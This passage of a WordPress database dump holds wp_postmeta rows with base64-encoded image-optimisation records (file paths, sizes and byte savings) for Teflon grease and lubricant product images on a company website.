8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNTksInRpbWUiOjE0ODM1NjkyNjksImlkIjoxNDU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1NywidGltZSI6MTQ4MzU2OTI3MSwiaWQiOjE0NTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24td2hpdGUtbGl0aGl1bS1ncmVhc2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24td2hpdGUtbGl0aGl1bS1ncmVhc2UtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24td2hpdGUtbGl0aGl1bS1ncmVhc2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjM3LCJ0aW1lIjoxNDgzNTY5Mjc0LCJpZCI6MTQ1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi13aGl0ZS1saXRoaXVtLWdyZWFzZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi13aGl0ZS1saXRoaXVtLWdyZWFzZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi13aGl0ZS1saXRoaXVtLWdyZWFzZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTI3NywiaWQiOjE0NTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24td2hpdGUtbGl0aGl1bS1ncmVhc2UtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24td2hpdGUtbGl0aGl1bS1ncmVhc2UtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24td2hpdGUtbGl0aGl1bS1ncmVhc2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkyODUsImlkIjoxNDU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXdoaXRlLWxpdGhpdW0tZ3JlYXNlLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5Mjg4LCJpZCI6MTQ1OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29438, 1458, 'wpfc_optimisation_reduction', '1403113'); 
INSERT INTO `wp_postmeta` VALUES (29439, 1458, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQuanBnIiwicmVkdWN0aW9uIjoxNDAyOTIxLCJ0aW1lIjoxNDgzNTY5MzAwLCJpZCI6IjE0NTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTMwMiwiaWQiOjE0NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzA2LCJpZCI6MTQ1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzMDksImlkIjoxNDU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzEzLCJpZCI6MTQ1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzMTUsImlkIjoxNDU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTMxOCwiaWQiOjE0NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzIxLCJpZCI6MTQ1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzMjQsImlkIjoxNDU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNTksInRpbWUiOjE0ODM1NjkzMjcsImlkIjoxNDU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzMwLCJpZCI6MTQ1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MjEsInRpbWUiOjE0ODM1NjkzMzIsImlkIjoxNDU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzM1LCJpZCI6MTQ1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTMzOCwiaWQiOjE0NTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzNDAsImlkIjoxNDU4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29440, 1457, 'wpfc_optimisation_reduction', '1116868'); 
INSERT INTO `wp_postmeta` VALUES (29441, 1457, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxMTE2NzUzLCJ0aW1lIjoxNDgzNTY5MzUxLCJpZCI6IjE0NTcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTM1NCwiaWQiOjE0NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzU3LCJpZCI6MTQ1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzNjAsImlkIjoxNDU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lX